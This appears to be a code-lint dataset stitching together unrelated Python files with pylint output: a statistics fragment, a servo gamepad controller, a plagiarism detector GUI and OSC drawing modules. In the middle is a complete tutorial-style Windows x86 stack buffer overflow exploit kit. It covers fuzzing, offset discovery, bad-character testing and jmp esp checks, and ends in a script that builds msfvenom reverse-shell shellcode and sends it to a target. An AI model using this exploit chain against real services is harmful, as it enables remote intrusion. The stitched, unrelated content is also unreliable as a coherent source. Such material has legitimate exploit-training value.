64 data_3 = df_3["mathscore"].tolist()
65 meanOfSample3 = statistics.mean(data_3)
66 print("Mean of Sample 3: ", meanOfSample3)
67 fig.add_trace(go.Scatter(x=[meanOfSample3, meanOfSample3], y=[0, 0.17], mode="lines", name="Mean of Sample 3"))
68
69 fig.show()
70
71 #Z-Score
72 ZScore = (meanOfSample1-P_mean)/P_stdev
73 print("Z-Score 1: ", ZScore)
74 ZScore3 = (meanOfSample3-P_mean)/P_stdev
75 print("Z-Score 3: ", ZScore3)
| 21 - warning: redefined-outer-name
21 - warning: unused-variable
3 - warning: unused-import
|
1 #!/usr/bin/env python
2
3 # Used to test bad characters as part of the process in developing a
4 # Windows x86 reverse shell stack buffer overflow
5 # Saved Return Pointer overwrite exploit.
6 # Parameters are saved in params.py for persistence.
7 # Delete params.py and params.pyc to reset them; or simply edit params.py
8 #
9 # Written by y0k3L
10 # Credit to Justin Steven and his 'dostackbufferoverflowgood' tutorial
11 # https://github.com/justinsteven/dostackbufferoverflowgood
12
13 import functions, argparse
14
15 # get parameters
16 RHOST = functions.getRhost()
17 RPORT = functions.getRport()
18 buf_totlen = functions.getBufTotlen()
19 offset_srp = functions.getOffsetSrp()
20
21 print "RHOST=%s; RPORT=%s; buf_totlen=%s; offset_srp=%s" % (RHOST, RPORT, buf_totlen, offset_srp)
22
23 parser = argparse.ArgumentParser()
24 parser.add_argument("-b", help="Bad characters in hex format, no spaces, eg. 0x0A,0x7B", dest='additional_bchars', nargs='+')
25
26 args = parser.parse_args()
27
28 print "Additional bad chars =", str(args.additional_bchars)
29
30 badchar_test = "" # start with an empty string
31 badchars = [0x00, 0x0A] # we've reasoned that these are definitely bad
32
33 if args.additional_bchars is not None:
34
35 extras = args.additional_bchars[0].split(",") # split out by comma delimeter
36
37 for i in range(0, len(extras)):
38 extras[i] = int(extras[i], 16) # convert from str to hex int
39 badchars.append(extras[i]) # append bad char to badchars list
40
41 # remove any duplicates
42 badchars = list(dict.fromkeys(badchars))
43
44 print "badchars =", [hex(x) for x in badchars]
45
46 # TODO check to see if badchars already exists...
47 functions.writeParamToFile("badchars", badchars)
48
49 # generate the string
50 for i in range(0x00, 0xFF+1): # range(0x00, 0xFF) only returns up to 0xFE
51 if i not in badchars: # skip the badchars
52 badchar_test += chr(i) # append each non-badchar to the string
53
54 try:
55 # open a file for writing ("w") the string as binary ("b") data
56 with open("badchar_test.bin", "wb") as f:
57 f.write(badchar_test)
58 except:
59 print "Error when writing to file. Quitting..."
60 quit()
61
62 buf = ""
63 buf += "A" * (offset_srp - len(buf)) # padding
64 buf += "BBBB" # SRP overwrite
65 buf += badchar_test # ESP points here
66 buf += "D" * (buf_totlen - len(buf)) # trailing padding
67 buf += "\n"
68
69 # print buf
70
71 sent = functions.sendBuffer(RHOST, RPORT, buf)
72
73 if sent is 0:
74 print "\nSet up mona byte array as follows:"
75 print "!mona bytearray -cpb \"\\x00\\x0a<other bad chars>\"\n"
76 print "Use \"!mona cmp -a esp -f C:\\path\\bytearray.bin\" to check bad chars."
77 print "Then run \"!mona jmp -r esp -cpb \"\\x00\\x0a<other bad chars>\" to search for \"jmp esp\" memory addresses."
78 print "\nAlso try \"!mona modules\" to find an unprotected module, followed by"
79 print "\"!mona find -s \"\\xff\\xe4\" -cpb \"\\x00\\x0a<other bad chars>\" -m <module_name>\""
80 print "\nEnter discovered jmp esp (or \\xff\\xe4) memory address at next step."
| 21 - error: syntax-error
|
1 #!/usr/bin/env python
2
3 # Used to confirm that the suspected offset is indeed correct. This is part of
4 # the process in developing a Windows x86 reverse shell stack buffer overflow
5 # Saved Return Pointer overwrite exploit.
6 # Parameters are saved in params.py for persistence.
7 # Delete params.py and params.pyc to reset them; or simply edit params.py
8 #
9 # Written by y0k3L
10 # Credit to Justin Steven and his 'dostackbufferoverflowgood' tutorial
11 # https://github.com/justinsteven/dostackbufferoverflowgood
12
13 import functions, os
14
15 # get parameters
16 RHOST = functions.getRhost()
17 RPORT = functions.getRport()
18 buf_totlen = functions.getBufTotlen()
19 offset_srp = functions.getOffsetSrp()
20
21 if offset_srp > buf_totlen-300:
22 print "Warning: offset is close to max buffer length. Recommend increasing "
23 print "max buffer length (buf_totlen)"
24
25 print "RHOST=%s; RPORT=%s; buf_totlen=%s; offset_srp=%s" % (RHOST, RPORT, buf_totlen, offset_srp)
26
27 buf = ""
28 buf += "A" * (offset_srp - len(buf)) # padding
29 buf += "BBBB" # SRP overwrite
30 buf += "CCCC" # ESP should end up pointing here
31 buf += "D" * (buf_totlen - len(buf)) # trailing padding
32 buf += "\n"
33
34 # print buf
35
36 sent = functions.sendBuffer(RHOST, RPORT, buf)
37
38 if sent is 0:
39 print "Confirm that EBP is all 0x41's, EIP is all 0x42's, and ESP points "
40 print "to four 0x43's followed by many 0x44's"
| 22 - error: syntax-error
|
1 #!/usr/bin/env python
2
3 # Uses a software interrupt to test the jmp esp functionality as part of the
4 # process in developing a Windows x86 reverse shell stack buffer overflow
5 # Saved Return Pointer overwrite exploit.
6 # Parameters are saved in params.py for persistence.
7 # Delete params.py and params.pyc to reset them; or simply edit params.py
8 #
9 # Written by y0k3L
10 # Credit to Justin Steven and his 'dostackbufferoverflowgood' tutorial
11 # https://github.com/justinsteven/dostackbufferoverflowgood
12
13 import struct, functions
14
15 # get parameters
16 RHOST = functions.getRhost()
17 RPORT = functions.getRport()
18 buf_totlen = functions.getBufTotlen()
19 offset_srp = functions.getOffsetSrp()
20 ptr_jmp_esp = functions.getPtrJmpEsp()
21
22 print "RHOST=%s; RPORT=%s; buf_totlen=%s; offset_srp=%s; ptr_jmp_esp=%s" % (RHOST, RPORT, buf_totlen, offset_srp, hex(ptr_jmp_esp))
23
24 buf = ""
25 buf += "A" * (offset_srp - len(buf)) # padding
26 buf += struct.pack("<I", ptr_jmp_esp) # SRP overwrite. Converts to little endian
27 buf += "\xCC\xCC\xCC\xCC" # ESP points here
28 buf += "D" * (buf_totlen - len(buf)) # trailing padding
29 buf += "\n"
30
31 # print buf
32
33 sent = functions.sendBuffer(RHOST, RPORT, buf)
34
35 if sent is 0:
36 print "Caught software interrupt?"
| 22 - error: syntax-error
|
1 #!/usr/bin/env python
2
3 # Windows x86 reverse shell stack buffer overflow
4 # Saved Return Pointer overwrite exploit.
5 # Parameters are saved in params.py for persistence.
6 # Delete params.py and params.pyc to reset them; or simply edit params.py
7 #
8 # Written by y0k3L
9 # Credit to Justin Steven and his 'dostackbufferoverflowgood' tutorial
10 # https://github.com/justinsteven/dostackbufferoverflowgood
11
12 import struct, functions, subprocess
13
14 # get parameters
15 RHOST = functions.getRhost()
16 RPORT = functions.getRport()
17 buf_totlen = functions.getBufTotlen()
18 offset_srp = functions.getOffsetSrp()
19 ptr_jmp_esp = functions.getPtrJmpEsp()
20 LHOST = functions.getLhost()
21 LPORT = functions.getLport()
22
23 print "RHOST=%s; RPORT=%s; buf_totlen=%s; offset_srp=%s; ptr_jmp_esp=%s" % (RHOST, RPORT, buf_totlen, offset_srp, hex(ptr_jmp_esp))
24
25 # instead of using NOPs, drag ESP up the stack to avoid GetPC issues
26 # note: when modifying ESP, always ensure that it remains divisible by 4
27 sub_esp_10 = "\x83\xec\x10"
28
29 LHOSTstr = "LHOST=" + LHOST
30 LPORTstr = "LPORT=" + str(LPORT)
31
32 # import shellcode from shellcode.py; or create shellcode if not exists
33 try:
34 import shellcode
35 print "shellcode.py already exists - using that shellcode..."
36 except:
37 badchars = [struct.pack("B", x).encode("hex") for x in functions.getBadChars()]
38 # print badchars
39 for x in range(0, len(badchars)):
40 badchars[x] = '\\x' + badchars[x]
41 # print a[x]
42 # print badchars
43
44 badcharsstr = "'" + ''.join(badchars) + "'"
45 print "badcharsstr =", badcharsstr
46
47 cmd = ["msfvenom", "-p", "windows/shell_reverse_tcp", LHOSTstr, LPORTstr, "EXITFUNC=thread", "-v", "shellcode", "-b", badcharsstr, "-f", "python", "-o", "shellcode.py"]
48
49 print ' '.join(cmd)
50
51 try:
52 subprocess.check_output(cmd)
53 import shellcode
54
55 except:
56 print "Error generating shellcode :("
57 exit()
58
59 buf = ""
60 buf += "A" * (offset_srp - len(buf)) # padding
61 buf += struct.pack("<I", ptr_jmp_esp) # SRP overwrite
62 buf += sub_esp_10 # ESP points here
63 buf += shellcode.shellcode
64 buf += "D" * (buf_totlen - len(buf)) # trailing padding
65 buf += "\n"
66
67 # print buf.encode("hex")
68
69 sent = functions.sendBuffer(RHOST, RPORT, buf)
70
71 if sent is 0:
72 print "Caught reverse shell?"
| 23 - error: syntax-error
|
1 #!/usr/bin/env python
2
3 import socket, argparse
4
5 parser = argparse.ArgumentParser()
6 parser.add_argument("RHOST", help="Remote host IP")
7 parser.add_argument("RPORT", help="Remote host port", type=int)
8 parser.add_argument("-l", help="Max buffer length in bytes; default 1024", type=int, default=1024, dest='buf_len')
9
10 args = parser.parse_args()
11
12 buf = "A" * args.buf_len + "\n"
13
14 print buf
15
16 print "Attempting to connect to service..."
17
18 try:
19 s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
20 s.settimeout(5)
21 s.connect((args.RHOST, args.RPORT))
22
23 print "Sending %s A's..." % args.buf_len
24 s.send(buf)
25
26 print "%s A's sent." % args.buf_len
27
28 except:
29 print "Error connecting to service..."
| 14 - error: syntax-error
|
1 #!/usr/bin/env python
2
3 import socket, argparse, time
4
5 parser = argparse.ArgumentParser()
6 parser.add_argument("RHOST", help="Remote host IP")
7 parser.add_argument("RPORT", help="Remote host port", type=int)
8 parser.add_argument("-l", help="Max number of bytes to send; default 1000", type=int, default=1000, dest='max_num_bytes')
9
10 args = parser.parse_args()
11
12 for i in range(100, args.max_num_bytes+1, 100):
13 buf = "A" * i
14 print "Fuzzing service with %s bytes" % i
15
16 try:
17 s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
18 s.settimeout(5)
19 s.connect((args.RHOST, args.RPORT))
20
21 s.send(buf + '\n')
22 s.recv(1024)
23 s.close()
24
25 time.sleep(0.5)
26
27 except:
28 print "Error connecting to service..."
29 if len(buf) > 100:
30 print "Crash occurred with buffer length: " + str(len(buf))
31 exit()
| 14 - error: syntax-error
|
1 # Functions supporting a Windows x86 reverse shell stack buffer overflow
2 # Saved Return Pointer overwrite exploit.
3 # Parameters are saved in params.py for persistence.
4 # Delete params.py and params.pyc to reset them; or simply edit params.py
5 #
6 # Written by y0k3L
7 # Credit to Justin Steven and his 'dostackbufferoverflowgood' tutorial
8 # https://github.com/justinsteven/dostackbufferoverflowgood
9
10 import socket, struct
11
12 # import params from params.py; or create an empty file if not exists
13 try:
14 import params
15 except:
16 open('params.py', 'a').close()
17 print "params.py created for parameter persistence."
18
19 # write parameter to file for persistence
20 def writeParamToFile(param_name, param_value):
21 with open("params.py", "a") as f:
22 f.write("%s = %s\n" % (param_name, param_value))
23
24 # return remote host (target) IP address
25 def getRhost():
26 try:
27 return params.RHOST
28 except:
29 RHOST = raw_input("RHOST: ")
30 writeParamToFile("RHOST", '\"' + RHOST + '\"')
31 return RHOST
32
33 # return remote host (target) port
34 def getRport():
35 try:
36 return params.RPORT
37 except:
38 RPORT = raw_input("RPORT: ")
39 writeParamToFile("RPORT", RPORT)
40 return int(RPORT)
41
42 # return local host (listening) IP address
43 def getLhost():
44 try:
45 return params.LHOST
46 except:
47 LHOST = raw_input("LHOST: ")
48 writeParamToFile("LHOST", '\"' + LHOST + '\"')
49 return LHOST
50
51 # return local host (listening) port
52 def getLport():
53 try:
54 return params.LPORT
55 except:
56 LPORT = raw_input("LPORT: ")
57 writeParamToFile("LPORT", LPORT)
58 return int(LPORT)
59
60 # return max buffer length
61 def getBufTotlen():
62 try:
63 return params.buf_totlen
64 except:
65 buf_totlen = raw_input("Max buffer length: ")
66 writeParamToFile("buf_totlen", buf_totlen)
67 return int(buf_totlen)
68
69 # return Saved Return Pointer offset
70 def getOffsetSrp():
71 try:
72 return params.offset_srp
73 except:
74 offset_srp = raw_input("offset_srp: ")
75 writeParamToFile("offset_srp", offset_srp)
76 return int(offset_srp)
77
78 # return pointer address to jmp esp
79 def getPtrJmpEsp():
80 try:
81 return params.ptr_jmp_esp
82 except:
83 ptr_jmp_esp = raw_input("ptr_jmp_esp: ")
84 writeParamToFile("ptr_jmp_esp", ptr_jmp_esp)
85 return int(ptr_jmp_esp, 16)
86
87 # return bad characters
88 def getBadChars():
89 try:
90 # return [hex(x) for x in params.badchars]
91 return params.badchars
92 except:
93 input = raw_input("Enter bad characters in hex format, no spaces, eg. 0x0A,0x7B: ")
94 input = input.split(",") # split out by comma delimeter
95
96 badchars = []
97
98 for i in range(0, len(input)):
99 input[i] = int(input[i], 16) # convert from str to hex int
100 badchars.append(input[i]) # append bad char to badchars list
101
102 # remove any duplicates
103 badchars = list(dict.fromkeys(badchars))
104
105 # writeParamToFile("badchars", '\"' + badchars + '\"')
106 writeParamToFile("badchars", badchars)
107 return badchars
108
109 # connect to remote host (target) and send buffer
110 # return 0 for success; return 1 for failure
111 def sendBuffer(RHOST, RPORT, buf):
112 print "Attempting to connect to service..."
113
114 try:
115 s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
116 s.settimeout(5)
117 s.connect((RHOST, RPORT))
118
119 print "Sending buffer..."
120 # this part may need to be modified depending on which command is vulnerable in the target service
121 s.send(buf)
122 s.close()
123
124 print "Buffer sent."
125
126 return 0
127
128 except:
129 print "Error connecting to service..."
130
131 return 1
132
133 # return unique pattern of desired length
134 def pattern_create(length):
135 pattern = ''
136 parts = ['A', 'a', '0']
137 while len(pattern) != length:
138 pattern += parts[len(pattern) % 3]
139 if len(pattern) % 3 == 0:
140 parts[2] = chr(ord(parts[2]) + 1)
141 if parts[2] > '9':
142 parts[2] = '0'
143 parts[1] = chr(ord(parts[1]) + 1)
144 if parts[1] > 'z':
145 parts[1] = 'a'
146 parts[0] = chr(ord(parts[0]) + 1)
147 if parts[0] > 'Z':
148 parts[0] = 'A'
149 return pattern
150
151 # return pattern offset given a unique pattern and value to search for
152 def pattern_offset(value, pattern):
153 value = struct.pack('<I', int(value, 16)).strip('\x00')
154 print "value =", value
155 try:
156 return pattern.index(value)
157 except ValueError:
158 print "Pattern not found..."
159 return "Not found"
| 17 - error: syntax-error
|
1 #!/usr/bin/env python
2
3 # Generates and sends a unique pattern to a service as part of the process in
4 # developing a Windows x86 reverse shell stack buffer overflow
5 # Saved Return Pointer overwrite exploit.
6 # Parameters are saved in params.py for persistence.
7 # Delete params.py and params.pyc to reset them; or simply edit params.py
8 #
9 # Written by y0k3L
10 # Credit to Justin Steven and his 'dostackbufferoverflowgood' tutorial
11 # https://github.com/justinsteven/dostackbufferoverflowgood
12
13 import functions
14
15 # get parameters
16 RHOST = functions.getRhost()
17 RPORT = functions.getRport()
18 buf_totlen = functions.getBufTotlen()
19
20 print "RHOST=%s; RPORT=%s; buf_totlen=%s" % (RHOST, RPORT, buf_totlen)
21
22 pattern = functions.pattern_create(buf_totlen)
23 pattern += '\n'
24 print pattern
25
26 sent = functions.sendBuffer(RHOST, RPORT, pattern)
27
28 if sent is 0:
29 print "EIP should now be overwritten."
30 eip_value = raw_input("EIP value: ")
31 offset_srp = functions.pattern_offset(eip_value, pattern)
32 print "offset_srp =", offset_srp
33 if "offset_srp" in open("params.py", "r").read() and offset_srp != functions.getOffsetSrp():
34 print "Something went wrong...offset_srp is already defined in params.py as %s" % functions.getOffsetSrp()
35 elif isinstance(offset_srp, int):
36 functions.writeParamToFile("offset_srp", offset_srp)
37 else:
38 print "Error: offset could not be found."
| 20 - error: syntax-error
|
1 from __future__ import division
2 import time
3 import pygame
4 from adafruit_servokit import ServoKit
5 pygame.init()
6
7
8
9 pwm = ServoKit(channels=16)
10 leftstick = 0.07
11 rightstick = 0.07
12 liftUP = 0.00
13 liftDOWN = 0.00
14 print('Initialized')
15
16
17 gamepad = pygame.joystick.Joystick(0)
18 gamepad.init()
19
20 while True:
21
22 pygame.event.get()
23
24 if abs(gamepad.get_axis(1)) <= 0.1:
25 leftstick = 0.1
26
27 elif abs(gamepad.get_axis(4)) <= 0.1:
28 rightstick = 0.1
29
30 elif abs(gamepad.get_button(3)) <= 0.1:
31 liftUP = 0.1
32
33 elif abs(gamepad.get_button(0)) <= 0.1:
34 liftDOWN = 0.1
35
36
37 leftstick = gamepad.get_axis(1)
38 rightstick = gamepad.get_axis(4)
39 liftUP = gamepad.get_button(3)
40 liftDOWN = -gamepad.get_button(0)
41
42
43 pwm.continuous_servo[1].throttle = leftstick
44 pwm.continuous_servo[4].throttle = rightstick
45 pwm.continuous_servo[11].throttle = liftUP
46 pwm.continuous_servo[11].throttle = liftDOWN
47
48 print("rightstick: ", rightstick)
49
50 print("leftstick: ", leftstick)
51
52 print("lift: ", liftUP)
53
54 print("lift: ", liftDOWN)
55
56
57 #axis 0 = A
58 #axis 3 = Y | 2 - warning: unused-import
|
1 from Preprocessing.cleantext import *
2
3 class Gram:
4 def __init__(self, text, hash_gram, start_pos, end_pos):
5 self.text = text
6 self.hash = hash_gram
7 self.start_pos = start_pos
8 self.end_pos = end_pos
9
10
11 def get_text_from_file(filename):
12 with open(filename, 'r') as f:
13 text = f.read().lower()
14 return text
15
16 def get_text_processing(text):
17 stop_symbols = [' ', ',']
18 return ''.join(j for j in text if not j in stop_symbols)
19
20 def get_hash_from_gram(gram, q):
21 h = 0
22 k = len(gram)
23 for char in gram:
24 x = int(ord(char)-ord('a') + 1)
25 h = (h * k + x) % q
26 return h
27
28 def get_k_grams_from_text(text, k = 25, q = 31):
29 grams = []
30 for i in range(0, len(text)-k+1):
31 hash_gram = get_hash_from_gram(text[i:i+k], q)
32 gram = Gram(text[i:i+k], hash_gram, i, i+k)
33 grams.append(gram)
34 return grams
35
36
37 def get_hashes_from_grams(grams):
38 hashes = []
39 for gram in grams:
40 hashes.append(gram.hash)
41 return hashes
42
43 def min_index(window):
44 min_ = window[0]
45 min_i = 0
46 for i in range(len(window)):
47 if window[i] < min_:
48 min_ = window[i]
49 min_i = i
50 return min_i
51
52 def winnow(hashes, w):
53 n = len(hashes)
54 prints = []
55 windows = []
56 prev_min = 0
57 current_min = 0
58 for i in range(n - w):
59 window = hashes[i:i+w]
60 windows.append(window)
61 current_min = i + min_index(window)
62 if not current_min == prev_min:
63 prints.append(hashes[current_min])
64 prev_min = current_min
65 return prints
66
67 def get_points(fp1, fp2, token, hashes, grams):
68 points = []
69 for i in fp1:
70 for j in fp2:
71 if i == j:
72 flag = 0
73 startx = endx = None
74 match = hashes.index(i)
75 newStart = grams[match].start_pos
76 newEnd = grams[match].end_pos
77
78 for k in token:
79 if k[2] == newStart:
80 startx = k[1]
81 flag = 1
82 if k[2] == newEnd:
83 endx = k[1]
84 if flag == 1 and endx != None:
85 points.append([startx, endx])
86 points.sort(key = lambda x: x[0])
87 points = points[1:]
88 return points
89
90 def get_merged_points(points):
91 mergedPoints = []
92 mergedPoints.append(points[0])
93 for i in range(1, len(points)):
94 last = mergedPoints[len(mergedPoints) - 1]
95 if points[i][0] >= last[0] and points[i][0] <= last[1]:
96 if points[i][1] > last[1]:
97 mergedPoints = mergedPoints[: len(mergedPoints)-1]
98 mergedPoints.append([last[0], points[i][1]])
99 else:
100 pass
101 else:
102 mergedPoints.append(points[i])
103 return mergedPoints
104
105 def get_fingerprints(file1, file2, k, q, w):
106
107 token1 = tokenize(file1)
108 token2 = tokenize(file2)
109
110 text1proc = toText(token1)
111 text2proc = toText(token2)
112
113 grams1 = get_k_grams_from_text(text1proc, k, q)
114 grams2 = get_k_grams_from_text(text2proc, k, q)
115
116 hashes1 = get_hashes_from_grams(grams1)
117 hashes2 = get_hashes_from_grams(grams2)
118
119 fp1 = winnow(hashes1, w)
120 fp2 = winnow(hashes2, w)
121
122 points1 = get_points(fp1, fp2, token1, hashes1, grams1)
123 points2 = get_points(fp1, fp2, token2, hashes2, grams2)
124
125 merged_points1 = get_merged_points(points1)
126 merged_points2 = get_merged_points(points2)
127 return (merged_points1, merged_points2)
128
| 1 - warning: wildcard-import
3 - refactor: too-few-public-methods
12 - warning: unspecified-encoding
105 - refactor: too-many-locals
107 - error: undefined-variable
108 - error: undefined-variable
110 - error: undefined-variable
111 - error: undefined-variable
|
1 from Algorithms.Winnowing import get_fingerprints, get_text_from_file
2 from tkinter import *
3 from tkinter import filedialog as fd
4 import locale
5
6 k = 15
7 q = 259#259
8 w = 4
9
10 class PlagiarismDetect(Frame):
11
12 def __init__(self, parent):
13 Frame.__init__(self, parent, background="white")
14
15 self.parent = parent
16 self.width = self.winfo_screenwidth()
17 self.height = self.winfo_screenheight()
18
19 self.parent.title("DetectPlagiarismMoss")
20 self.pack(fill=BOTH, expand=True)
21
22 self.file1 = 'file1'
23 self.file2 = 'file2'
24
25 self.create_main_menu()
26
27 def choice_f1(self):
28 self.file1 = fd.askopenfilename(defaultextension='.cpp', filetypes=[('CPP', '.cpp'),('TXT', '.txt'), ('Py', '.py')])
29 self.text_info_menu['text'] = "Загрузите\n {}\n {}:".format(self.file1, self.file2)
30
31 def choice_f2(self):
32 self.file2 = fd.askopenfilename(defaultextension='.cpp', filetypes=[('CPP', '.cpp'),('TXT', '.txt'),('Py', '.py')])
33 self.text_info_menu['text'] = "Загрузите\n {}\n {}:".format(self.file1, self.file2)
34
35 def print_file1(self,text, points, side):
36 newCode = text[: points[0][0]]
37 if side == 0:
38 textfield = self.text1
39 else:
40 textfield = self.text2
41 textfield.insert('end', newCode)
42 plagCount = 0
43 for i in range(len(points)):
44 if points[i][1] > points[i][0]:
45 plagCount += points[i][1] - points[i][0]
46 newCode = newCode + text[points[i][0] : points[i][1]]
47 textfield.insert('end', text[points[i][0] : points[i][1]], 'warning')
48 if i < len(points) - 1:
49 newCode = newCode + text[points[i][1] : points[i+1][0]]
50 textfield.insert('end', text[points[i][1] : points[i+1][0]])
51 else:
52 newCode = newCode + text[points[i][1] :]
53 textfield.insert('end', text[points[i][1] :])
54 return plagCount / len(text)
55
56 def analyze(self):
57 self.text1.tag_config('warning', background="orange",)
58 self.text2.tag_config('warning', background="orange")
59 text1 = get_text_from_file(self.file1)
60 text2 = get_text_from_file(self.file2)
61
62 mergedPoints = get_fingerprints(self.file1, self.file2, k, q, w)
63 res = self.print_file1(text1, mergedPoints[0], 0)
64 res1 = self.print_file1(text2, mergedPoints[1], 1)
65 self.text_plagiarism['text'] = "Уникальность файла: {} : {}%\nУникальность файла: {} : {}%".format(self.file1.split('/')[-1::][0], int((1-res)*100), self.file2.split('/')[-1::][0], int((1-res1)*100))
66
67
68
69 def create_main_menu(self):
70 frame1 = Frame(self)
71 frame1.pack(fill=X)
72 frame1.config(bg="white")
73 self.text_info_menu = Label(frame1, text="Загрузите \n{} \n{}:".format(self.file1, self.file2), font=("Arial Bold", 20))
74 self.text_info_menu.config(bg="white")
75 self.text_info_menu.pack()
76
77 self.text_plagiarism = Label(frame1, text="Уникальность файла: {} : {}%\nУникальность файла: {} : {}%".format("",0, "", 0), font=("Arial Bold", 20))
78 self.text_plagiarism.config(bg="white")
79 self.text_plagiarism.pack()
80 choice_file2 = Button(frame1, text="Файл №2", command=self.choice_f2)
81 choice_file2.pack(side=RIGHT, expand=True)
82 choice_file1 = Button(frame1, text="Файл №1", command=self.choice_f1)
83 choice_file1.pack(side=RIGHT, expand=True)
84
85 frame2 = Frame(self)
86 frame2.pack(fill=X)
87 frame2.config(bg="white")
88 analyze = Button(frame2, text="Обработать", command=self.analyze)
89 analyze.pack()
90
91 frame3 = Frame(self)
92 frame3.pack(fill=X)
93 frame3.config(bg="white")
94 self.text1 = Text(frame3, width=int(100), height=int(100))
95 self.text1.pack(side=LEFT)
96 self.text2 = Text(frame3, width=int(100), height=int(100))
97 self.text2.pack(side=LEFT)
98
99
100
101
102 def main():
103 locale.setlocale(locale.LC_ALL, 'ru_RU.UTF8')
104 root = Tk()
105 root.geometry("{}x{}".format(root.winfo_screenwidth(), root.winfo_screenheight()))
106 app = PlagiarismDetect(root)
107 root.mainloop()
108
109 if __name__ == '__main__':
110 main() | 2 - warning: wildcard-import
10 - refactor: too-many-instance-attributes
106 - warning: unused-variable
2 - warning: unused-wildcard-import
|
1 import threading
2 from sonilab import event
3 import shape
4
5 """
6 Shapes treats array of shape.
7 """
8
9 LOCK = threading.Lock()
10 data = {}
11 count = 0
12
13 def add(name, obj):
14 global LOCK , count
15 with LOCK:
16 data[name]=(count , obj)
17 count += 1
18
19
20
21 def get_primitive(name):
22 tuple_uid_and_obj = data[name]
23 uid = tuple_uid_and_obj[0]
24 obj = tuple_uid_and_obj[1]
25
26 tuple_address_and_params = obj.get_primitive()
27 adr = tuple_address_and_params[0]
28 params = tuple_address_and_params[1]
29 params.insert(0, uid)
30 return (adr,params)
31
32
33
34 def get_all():
35 container = []
36 for elm in data:
37 tmp = data[elm]
38 container.append( get_primitive(tmp[1].name) )
39 return container
40
41
42
43 def get(name):
44 tuple_uid_and_obj = data[name]
45 return tuple_uid_and_obj[1]
46
47
48
49 def set(name, variable, *args):
50 if args:
51 tuple_uid_and_obj = data[name]
52 obj = tuple_uid_and_obj[1]
53 obj.set(variable, *args)
54
55
56
57 def print_all():
58 print "--- [shapes : print_all() ] ---"
59 for elm in data:
60 tmp = data[elm]
61 obj = tmp[1]
62 tmp = obj.get_primitive()
63 params = tmp[1]
64 print elm , obj
65 for param in params:
66 print param ,
67
68 print "\n--"
69
70 print "--- [print_all() : end] ---"
71
72
73
| 58 - error: syntax-error
|
1 # if you want to use this library from outside of sonilab folder, should import as follows,
2 # from sonilab import sl_metro, sl_osc_send, osc_receive, event
3 # enjoy !!
4
5 import random
6 from sonilab import sl_metro, sl_osc_send, osc_receive, event
7 import shapes, shape, send_all
8
9 metro = sl_metro.Metro(0.016)
10 metro2 = sl_metro.Metro(0.5)
11 sender = sl_osc_send.slOscSend("127.0.0.1" , 57137)
12 receiver = osc_receive.OscReceive(57138)
13
14 ball_posi_a = 0.1
15 ball_posi_b = 0.9
16 ball_speed = 0.5
17
18
19 def osc_received (vals):
20 print "OSC RECEIVED :: arg[0] = " + str(vals[0]) + " | arg[1] = " + str(vals[1])
21
22
23
24 def send(adr, vals):
25 sender.send(adr, vals)
26
27 event.add("/test" , osc_received)
28 event.add("/send" , send)
29 receiver.setup("/foo")
30
31
32
33 def init():
34 global ball_posi_a, ball_posi_b
35 #Make Primitives
36 node1 = shape.Shape("/circle" , "node1") #set shape_type tag and unique name
37 node1.set("x1" , ball_posi_a)
38 node1.set("y1" , 0.5)
39 node1.set("size" , 0.005)
40 node1.set("fill" , 0)
41 shapes.add(node1.name , node1)
42
43 node2 = shape.Shape("/circle" , "node2") #set shape_type tag and unique name
44 node2.set("x1" , ball_posi_b)
45 node2.set("y1" , 0.5)
46 node2.set("size" , 0.005)
47 node2.set("fill" , 0)
48 shapes.add(node2.name , node2)
49
50 ball = shape.Shape("/circle" , "ball") #set shape_type tag and unique name
51 ball.set("x1" , ball_posi_a)
52 ball.set("y1" , 0.5)
53 ball.set("size" , 0.005)
54 ball.set("fill" , 1)
55 shapes.add(ball.name , ball)
56
57 arc = shape.Shape("/arc" , "arc") #set shape_type tag and unique name
58 arc.set("x1" , ball_posi_a)
59 arc.set("y1" , 0.5)
60 arc.set("x2" , ball_posi_b)
61 arc.set("y2" , 0.5)
62 arc.set("height", 0.3)
63 shapes.add(arc.name , arc)
64
65 wave = shape.Shape("/wave", "wave")
66 wave.set("x1" , ball_posi_a)
67 wave.set("y1" , 0.5)
68 wave.set("x2" , ball_posi_b)
69 wave.set("y2" , 0.5)
70 wave.set("height", 0.3)
71 wave.set("freq" , 4.0)
72 wave.set("phase", 0.0)
73 shapes.add(wave.name , wave)
74
75
76
77 def get_primitive(name):
78 tmp = shapes.get_primitive(name)
79 return tmp[1] #<- shapes.get_primitive returns a tupple. It includes the shape_tag(same as osc_address) and the list of parameters.
80
81
82 def move_ball():
83 print "move_ball"
84 global ball_posi_a, ball_posi_b, ball_speed
85 ball = shapes.get("ball")
86 arc = shapes.get("arc")
87 wave = shapes.get("wave")
88 ball_x = ball.get('x1')
89 print ball_x
90 if ball_x == ball_posi_a:
91 print "A"
92 ball.set("x1" , ball_posi_b, ball_speed)
93 arc.set("height", 0.3, ball_speed)
94 wave.set("freq", 7.0, ball_speed)
95 elif ball_x == ball_posi_b:
96 print "B"
97 ball.set("x1" , ball_posi_a, ball_speed)
98 arc.set("height", -0.3, ball_speed)
99 wave.set("freq", 2.0, ball_speed)
100
101
102 def draw():
103 dic = shapes.get_all()
104 send_all.run(dic)
105
106
107
108 try :
109 #INIT all objects
110 init()
111 prim = None
112
113 #Start Loop
114 while True:
115 if metro.update():
116 draw()
117 if metro2.update(): #write code to execute every 1 sec
118 prim = get_primitive("ball")
119 print "x1 = " , prim[1] , " : y1 = " , prim[2]
120 if random.randint(0,1) == 1:
121 move_ball() #move ball with 50 percent rate in each round
122
123
124 except KeyboardInterrupt :
125 receiver.terminate()
| 20 - error: syntax-error
|
1 from sonilab import timed_interpolation
2 class Shape:
3 """ Shape Class """
4
5 def __init__(self, type, name):
6
7 """
8 To instanciate, you should set two argments.
9 The one is type. Type means the shape type. It is also used as address for OSC Message.
10 The types are /circle, /triangle, /square, /rect, /line, /arc, /wave etc.
11
12 The second is name. It is unique name for each shape object.
13 However, the uniquness of the name must be proofed by user.
14 """
15
16 self.uid = 0
17 self.type = type
18 self.name = name
19 self.active = 0
20 self._x1 = timed_interpolation.TimedInterpolation()
21 self._x1.set(0.5, 0.0)
22 self._y1 = timed_interpolation.TimedInterpolation()
23 self._y1.set(0.5, 0.0)
24 self._x2 = timed_interpolation.TimedInterpolation()
25 self._x2.set(0.5, 0.0)
26 self._y2 = timed_interpolation.TimedInterpolation()
27 self._y2.set(0.5, 0.0)
28
